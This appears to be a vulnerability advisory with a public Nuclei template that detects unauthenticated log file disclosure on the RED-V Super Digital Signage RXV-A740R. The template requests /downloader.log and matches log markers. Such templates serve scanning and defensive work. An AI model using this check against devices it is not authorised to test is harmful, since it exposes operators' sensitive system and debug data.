redv-super-logs: RED-V Super Digital Signage System RXV-A740R - Log Information Disclosure

Date: 2025-08-01 | Affected software: RED-V Super Digital Signage System RXV-A740R | PoC: public

Vulnerability description

The application is vulnerable to sensitive information disclosure. An unauthenticated attacker can visit several endpoints and disclose the web server's log file list, which contains sensitive system resources and debug log information from the device.

PoC code [public]

id: redv-super-logs

info:
  name: RED-V Super Digital Signage System RXV-A740R - Log Information Disclosure
  author: r3Y3r53
  severity: medium
  description: |
    The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several endpoints and disclose the webserver's log file list containing sensitive system resources and debug log information running on the device.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php
  metadata:
    verified: true
    max-request: 1
  tags: redv,log,disclosure,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.log"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/plain")'
          - 'contains_all(body, "Log file", "[LogParser]", "[INFO]")'
        condition: and
# digest: 4a0a0047304502200af195d2ad9de95400b4ad305318387300e3b97ee5234cabdf4f11d32753cfb5022100f26e980b2788a00a4b262b8b349a40addeba17b5d93adb502d0b8fbd6030faa0:922c64590222798bb761d5b6d8e72950